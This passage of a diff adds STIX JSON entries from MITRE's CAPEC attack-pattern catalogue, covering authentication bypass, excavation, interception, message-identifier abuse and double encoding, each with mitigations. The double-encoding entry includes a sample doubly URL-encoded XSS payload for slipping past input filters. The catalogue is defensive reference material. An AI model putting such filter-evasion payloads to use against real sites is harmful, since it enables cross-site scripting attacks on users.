The attacker is therefore able to access protected data without authentication ever having taken place.", + "external_references": [ + { + "external_id": "CAPEC-115", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/115.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "description": "Abuse Elevation Control Mechanism", + "external_id": "T1548", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-598", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Bypassing_Authentication_Schema.html" + } + ], + "id": "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Authentication Bypass", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n This refers to an attacker gaining access equivalent to an authenticated user without ever going through an authentication procedure. This is usually the result of the attacker using an unexpected access procedure that does not go through the proper checkpoints where authentication should occur. 
For example, a web site might assume that all users will click through a given link in order to get to secure material and simply authenticate everyone that clicks the link. However, an attacker might be able to reach secured web content by explicitly entering the path to the content rather than clicking through the authentication link, thereby avoiding the check entirely. This attack pattern differs from other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than faking authentication by exploiting flaws or by stealing credentials from legitimate users.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29", + "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471", + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b", + "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6" + ], + "x_capec_prerequisites": [ + "An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc." + ], + "x_capec_resources_required": [ + "A client application, such as a web browser, or a scripting language capable of interacting with the target." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary actively probes the target in a manner that is designed to solicit information that could be leveraged for malicious purposes.", + "external_references": [ + { + "external_id": "CAPEC-116", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/116.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-1243", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1243.html" + } + ], + "id": "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Excavation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_precede_refs": [ + "attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_extended_description": "\n This is achieved by exploring the target via ordinary interactions for the purpose of gathering intelligence about the target, or by sending data that is syntactically invalid or non-standard in an attempt to produce a response that contains the desired data. As a result of these interactions, the adversary is able to obtain information from the target that aids the attacker in making inferences about its security, configuration, or potential vulnerabilities. 
Examplar exchanges with the target may trigger unhandled exceptions or verbose error messages that reveal information like stack traces, configuration information, path information, or database design. This type of attack also includes the manipulation of query strings in a URI to produce invalid SQL queries, or by trying alternative path values in the hope that the server will return useful information.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1", + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7", + "attack-pattern--52103765-d380-42fc-aa4d-a8b24615548a", + "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a" + ], + "x_capec_prerequisites": [ + "An adversary requires some way of interacting with the system." + ], + "x_capec_resources_required": [ + "A tool, such as an Adversary in the Middle (CAPEC-94) Proxy or a fuzzer, that is capable of generating and injecting custom inputs to be used in the attack." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Minimize error/response output to only what is necessary for functional use or corrective language.", + "id": "course-of-action--b173381f-e049-4ddb-b252-3cd3e9860f04", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-116-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd9e7627-0b39-4948-90a3-d4d2f54da8d8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b173381f-e049-4ddb-b252-3cd3e9860f04", + "spec_version": "2.1", + "target_ref": "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Remove potentially sensitive information that is not necessary for the application's functionality.", + "id": "course-of-action--f79678b2-0a62-418a-907b-5e73dd03e3bc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-116-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1a976d5b-38ec-4508-8329-3a6a82d44d97", + "modified": "2022-09-29T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f79678b2-0a62-418a-907b-5e73dd03e3bc", + "spec_version": "2.1", + "target_ref": "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary monitors data streams to or from the target for information gathering purposes. This attack may be undertaken to solely gather sensitive information or to support a further attack against the target. This attack pattern can involve sniffing network traffic as well as other types of data streams (e.g. radio). The adversary can attempt to initiate the establishment of a data stream or passively observe the communications as they unfold. In all variants of this attack, the adversary is not the intended recipient of the data stream. In contrast to other means of gathering information (e.g., targeting data leaks), the adversary must actively position themself so as to observe explicit data channels (e.g. network traffic) and read the content. 
However, this attack differs from a Adversary-In-the-Middle (CAPEC-94) attack, as the adversary does not alter the content of the communications nor forward data to the intended recipient.", + "external_references": [ + { + "external_id": "CAPEC-117", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/117.html" + }, + { + "external_id": "CWE-319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html" + } + ], + "id": "attack-pattern--bdc2219a-ebe0-4372-90b8-841dd7bd4c8e", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Interception", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Physical Security" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec", + "attack-pattern--48f21dcd-2490-49c6-9690-1cb586b201f4", + "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8" + ], + "x_capec_prerequisites": [ + "The target must transmit data over a medium that is accessible to the adversary." + ], + "x_capec_resources_required": [ + "The adversary must have the necessary technology to intercept information passing between the nodes of a network. For TCP/IP, the capability to run tcpdump, ethereal, etc. can be useful. Depending upon the data being targeted the technological requirements will change." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage encryption to encode the transmission of data thus making it accessible only to authorized parties.", + "id": "course-of-action--2e4a2bce-d5ab-429d-91d4-b26c22f7f02b", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-117-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--859073fb-487f-4a31-b50e-4cceb762f731", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e4a2bce-d5ab-429d-91d4-b26c22f7f02b", + "spec_version": "2.1", + "target_ref": "attack-pattern--bdc2219a-ebe0-4372-90b8-841dd7bd4c8e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This pattern of attack is defined by the selection of messages distributed via multicast or public information channels that are intended for another client by determining the parameter value assigned to that client. This attack allows the adversary to gain access to potentially privileged information, and to possibly perpetrate other attacks through the distribution means by impersonation. 
If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could be used to change the adversary's identifier to more a privileged one.", + "external_references": [ + { + "external_id": "CAPEC-12", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/12.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + } + ], + "id": "attack-pattern--d9904019-98fa-4beb-ae5a-f667e516269e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Choosing Message Identifier", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "A certain B2B interface on a large application codes for messages passed over an MQSeries queue, on a single \"Partners\" channel. Messages on that channel code for their client destination based on a partner_ID field, held by each message. That field is a simple integer. Adversaries having access to that channel, perhaps a particularly nosey partner, can simply choose to store messages of another partner's ID and read them as they desire. Note that authentication does not prevent a partner from leveraging this attack on other partners. It simply disallows adversaries without partner status from conducting this attack." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Nature of Messages: Determine the nature of messages being transported as well as the identifiers to be used as part of the attack

Experiment

  1. Authenticate: If required, authenticate to the distribution channel

  2. Identify Known Client Identifiers: If any particular client's information is available through a control channel available to all users, the adversary will discover particular identifiers for targeted clients by observing this channel, or requesting client information through this channel.

  3. Change Message Identifier: Adversaries with client access connecting to output channels could change their channel identifier and see someone else's (perhaps more privileged) data.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_peer_of_refs": [ + "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228" + ], + "x_capec_prerequisites": [ + "Information and client-sensitive (and client-specific) data must be present through a distribution channel available to all users.", + "Distribution means must code (through channel, message identifiers, or convention) message destination in a manner visible within the distribution means itself (such as a control channel) or in the messages themselves." + ], + "x_capec_resources_required": [ + "The adversary needs the ability to control source code or application configuration responsible for selecting which message/channel id is absorbed from the public distribution means." + ], + "x_capec_skills_required": { + "Low": "All the adversary needs to discover is the format of the messages on the channel/distribution means and the particular identifier used within the messages." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Associate some ACL (in the form of a token) with an authenticated user which they provide middleware. 
The middleware uses this token as part of its channel/message selection for that client, or part of a discerning authorization decision for privileged channels/messages.\n The purpose is to architect the system in a way that associates proper authentication/authorization with each channel/message.\n ", + "id": "course-of-action--a9ab8b72-4e44-4c81-bf44-e366ff5503d4", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-12-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3057788f-a10c-42ba-86f8-673bdaa92ba0", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a9ab8b72-4e44-4c81-bf44-e366ff5503d4", + "spec_version": "2.1", + "target_ref": "attack-pattern--d9904019-98fa-4beb-ae5a-f667e516269e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Re-architect system input/output channels as appropriate to distribute self-protecting data. 
That is, encrypt (or otherwise protect) channels/messages so that only authorized readers can see them.", + "id": "course-of-action--dcc7f9fa-ae3e-4b43-ae71-e3c7a72ea187", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-12-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8d1d83e8-400f-438d-a941-c0692758395f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dcc7f9fa-ae3e-4b43-ae71-e3c7a72ea187", + "spec_version": "2.1", + "target_ref": "attack-pattern--d9904019-98fa-4beb-ae5a-f667e516269e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) 
by interpreters on the target.", + "external_references": [ + { + "external_id": "CAPEC-120", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-183", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/183.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-692", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html" + } + ], + "id": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Double Encoding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Double Enconding Attacks can often be used to bypass Cross Site Scripting (XSS) detection and execute XSS attacks.:\n 
%253Cscript%253Ealert('This is an XSS Attack')%253C%252Fscript%253E\n Since <, <, and / are often sued to perform web attacks, these may be captured by XSS filters. The use of double encouding prevents the filter from working as intended and allows the XSS to bypass dectection. This can allow an adversary to execute malicious code.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an attacker records all entry points to the application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: Try double-encoding for parts of the input in order to try to get past the filters. For instance, by double encoding certain characters in the URL (e.g. dots and slashes) an adversary may try to get access to restricted resources on the web server or force browse to protected pages (thus subverting the authorization service). An adversary can also attempt other injection style attacks using this attack pattern: command injection, SQL injection, etc.

  2. Techniques
    Try to use double-encoding to bypass validation routines.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target's filters must fail to detect that a character has been doubly encoded but its interpreting engine must still be able to convert a doubly encoded character to an un-encoded character.", + "The application accepts and decodes URL string request.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_resources_required": [ + "Tools that automate encoding of data can assist the adversary in generating encoded strings." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. 
Test your decoding process against malicious input.", + "id": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--44b07350-79d0-449c-b510-54552ac1b8ac", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "spec_version": "2.1", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding.", + "id": "course-of-action--1b63d492-1270-4630-97ef-521ac9d05eec", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cfa73c3f-86a6-476f-aab5-335c5f41f2ac", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b63d492-1270-4630-97ef-521ac9d05eec", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When client input is required from web-based forms, avoid using the \"GET\" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the \"POST method whenever possible.", + "id": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e482c72-7993-4ddf-8fca-22de8312c642", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "spec_version": "2.1", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Any security checks should occur after the data has been decoded and validated as correct data format. 
Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process.", + "id": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ba444e1f-3d84-4501-b9c6-09b06a824f96", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "spec_version": "2.1", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Refer to the RFCs to safely decode URL.", + "id": "course-of-action--1f048925-3094-483c-abf2-c5efe689193a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--11ad9490-5c2d-4430-8ecc-b0740ebc3c54", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f048925-3094-483c-abf2-c5efe689193a", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive.", + "id": "course-of-action--1890182c-6989-4e34-bfb2-92b223bcae0c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0f1b0725-8a4f-49f1-9954-eb67b0182990", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1890182c-6989-4e34-bfb2-92b223bcae0c", + "spec_version": "2.1", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx).", + "id": "course-of-action--24852297-758a-489f-b2c9-a27cbfbb938e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--be25410a-e03c-4307-88da-60d4e71e7f4d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--24852297-758a-489f-b2c9-a27cbfbb938e", + "spec_version": "2.1", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits a sample, demonstration, test, or debug interface that is unintentionally enabled on a production system, with the goal of gleaning information or leveraging functionality that would otherwise be unavailable.\n ", + "external_references": [ + { + "external_id": "CAPEC-121", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/121.html" + }, + { + "external_id": "CWE-489", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/489.html" + }, + { + "external_id": "CWE-1209", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1209.html" + }, + { + "external_id": "CWE-1259", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1259.html" + }, + { + "external_id": "CWE-1267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1267.html" + }, + { + "external_id": "CWE-1270", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1270.html" + }, + { + 